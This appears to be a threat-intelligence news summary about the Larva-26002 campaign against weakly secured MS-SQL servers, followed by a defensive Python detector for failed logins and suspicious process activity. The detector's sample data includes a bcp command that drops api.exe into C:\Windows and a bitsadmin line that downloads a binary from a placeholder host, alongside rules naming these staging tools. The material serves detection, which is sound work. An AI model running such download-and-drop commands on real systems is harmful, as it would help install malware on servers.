Threat Intel · HIGH

Threat Intel - Continuous Attacks on MS-SQL Servers Unveiled

Cyber Security News · Reporting by Tushar Subhra Dutta
Summary by CyberPings Editorial · AI-assisted · Reviewed by Rohit Rana

In short: attackers are compromising poorly protected MS-SQL servers to install new malware.

Quick Summary

A persistent threat actor is targeting MS-SQL servers using new malware. This ongoing campaign risks extensive data exposure due to poor database security practices. Administrators must act now to secure their systems.

The Threat

The threat actor known as Larva-26002 has been relentlessly targeting Microsoft SQL (MS-SQL) servers since January 2024. This campaign has evolved from a ransomware operation to a more sophisticated strategy involving the deployment of a new scanner malware called ICE Cloud Client. The attacks, which are ongoing into 2026, utilize various tools and techniques to exploit poorly managed servers, indicating a long-term commitment to this malicious endeavor.

Initially, the group deployed Trigona and Mimic ransomware on exposed MS-SQL servers with weak credentials. They exploited the Bulk Copy Program (BCP) utility to install malware directly onto compromised hosts. Over time, they have upgraded their tools, including the introduction of a Rust-based scanner in 2025, and now the Go-based ICE Cloud Client in 2026. This progression shows the attackers' adaptability and determination to exploit vulnerabilities in database infrastructure.

Who's Behind It

Larva-26002 has demonstrated a clear pattern of targeting the same MS-SQL servers repeatedly. Their attacks are characterized by a shift from ransomware to scanning, which suggests they are building a network of compromised servers. The ICE Cloud Client malware collects data from these servers and sends it back to the attacker's command and control (C&C) server, allowing them to map out exposed database assets across the internet. This strategic approach raises concerns about the potential for larger, more damaging attacks in the future.

The use of Turkish binary strings within the malware hints at the attackers' origins or operational base, further linking them to previous incidents involving Mimic ransomware. This connection emphasizes the importance of recognizing patterns in cyber threats to better defend against them.

Tactics & Techniques

The attack chain begins when Larva-26002 identifies a poorly secured MS-SQL server. The group gains access through brute-force or dictionary attacks against database logins, then executes system commands to profile the host. The malware binary is written to disk with the Bulk Copy Program (BCP) utility, which exports it from data staged in the database. Where BCP fails, they fall back to tools such as curl or bitsadmin, invoked via PowerShell, to download the malware.

Once the ICE Cloud Launcher is executed, it connects to the C&C server to authenticate and download the core ICE Cloud Client. This client is disguised under random filenames to evade detection. It registers with the C&C server, receiving a list of MS-SQL addresses to target, along with credential pairs for login attempts. The entire process showcases the attackers' technical proficiency and their ability to adapt their strategies over time.

Defensive Measures

To mitigate the risks posed by Larva-26002, database administrators must take proactive measures. Here are some recommended actions:

  • Enforce strong passwords for all MS-SQL accounts and change them regularly.
  • Implement firewalls to restrict internet access to MS-SQL servers, allowing only authorized connections.
  • Regularly update endpoint security software to catch known malware before it executes.
  • Monitor for unusual BCP activity or unexpected files like api.exe in the system directories.
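The monitoring items above can be turned into concrete checks. The following is an added example, not code from the article or from the researchers it summarizes: it counts failed SQL logins per client address in SQL Server ERRORLOG lines (the trail a password-guessing run leaves) and flags process events where sqlservr.exe spawns a staging tool, or bcp/curl/bitsadmin writes into C:\Windows, or api.exe is dropped there. The log lines and process records are constructed sample data.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample data, not taken from the article. The ERRORLOG lines follow
# the real "Login failed for user '...' ... [CLIENT: ip]" format SQL Server writes.
ERRORLOG = [
    "2026-01-12 03:14:01.10 Logon Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]",
    "2026-01-12 03:14:01.31 Logon Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]",
    "2026-01-12 03:14:01.52 Logon Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.7]",
    "2026-01-12 03:14:02.08 Logon Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]",
    "2026-01-12 09:02:15.00 Logon Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.25]",
]
# Constructed process-creation records in the shape of Sysmon event ID 1 fields.
PROC_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c bcp "select b from tempdb..t" queryout C:\Windows\api.exe -T -f C:\Windows\Temp\f.fmt'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j http://example.invalid/x.bin C:\Windows\api.exe"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Git\bin\git.exe", "cmdline": "git pull"},
]

FAILED_LOGIN = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
STAGING_TOOLS = {"bcp.exe", "curl.exe", "bitsadmin.exe", "powershell.exe", "cmd.exe"}
STAGING_WORDS = re.compile(r"\b(bcp|curl|bitsadmin)\b")

def failed_login_sources(lines, threshold=3):
    """Return {client_ip: failure_count} for addresses at or above the threshold."""
    counts = Counter()
    for line in lines:
        m = FAILED_LOGIN.search(line)
        if m:
            counts[m["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

def suspicious_process_events(events):
    """Flag sqlservr.exe spawning staging tools, staging tools writing to C:\\Windows, and api.exe drops."""
    findings = []
    for ev in events:
        parent = PureWindowsPath(ev["parent"]).name.lower()
        image = PureWindowsPath(ev["image"]).name.lower()
        cmd = ev["cmdline"].lower()
        if parent == "sqlservr.exe" and image in STAGING_TOOLS:
            findings.append(("sqlservr-spawned-tool", image))
        if STAGING_WORDS.search(cmd) and "c:\\windows\\" in cmd:
            findings.append(("staging-tool-writes-system-dir", image))
        if "c:\\windows\\api.exe" in cmd:
            findings.append(("api-exe-dropped", image))
    return findings
```

In production the same rules would read the live ERRORLOG and a process-creation event feed rather than the inline samples; the threshold should be tuned to the instance's normal failed-login rate.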

By following these guidelines, organizations can better protect themselves against the ongoing threats posed by Larva-26002 and similar actors. Vigilance and proactive security measures are essential in the ever-evolving landscape of cyber threats.

🔒 Pro insight: The shift from ransomware to scanning indicates a strategic pivot, suggesting Larva-26002 aims to build a robust infrastructure for future attacks.

Original article from Cyber Security News · Tushar Subhra Dutta
